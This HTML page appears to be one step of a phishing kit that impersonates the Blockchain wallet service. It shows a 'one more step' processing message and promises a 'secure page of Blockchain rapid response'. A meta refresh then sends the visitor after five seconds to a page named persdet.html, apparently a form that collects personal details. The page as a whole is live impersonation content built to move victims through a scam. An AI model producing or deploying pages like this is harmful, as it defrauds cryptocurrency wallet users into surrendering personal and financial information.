<!DOCTYPE html>
<html>

<head>

	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<title>Blockchain Wallet</title>

	<link rel="stylesheet" href="assets/deo.css">
	<link rel="stylesheet" href="assets/ontop.css">
	<link rel="shortcut icon" href="assets/bchtp.png">
	<meta http-equiv="refresh" content="5; URL='persdet.html" />

</head>


	<header>
		<h1>BLOCKCHAIN</h1>
    </header>
    
      <div class="main-content">

       	<div class="row">
		     <h3 style="font-weight:bold; padding-top:25px; color:#FFF; text-align:center;">One more step and you are done.</h3>
		     <h4 style="text-align:center; color:#FFF;"> You will be redirected to a secure page of Blockchain rapid response.</h4><br><br>
			 <p style="text-align:center;"><img src="assets/processing-please-wait-gif-9.gif"></p>
		</div>

    </div>

</body>

</html>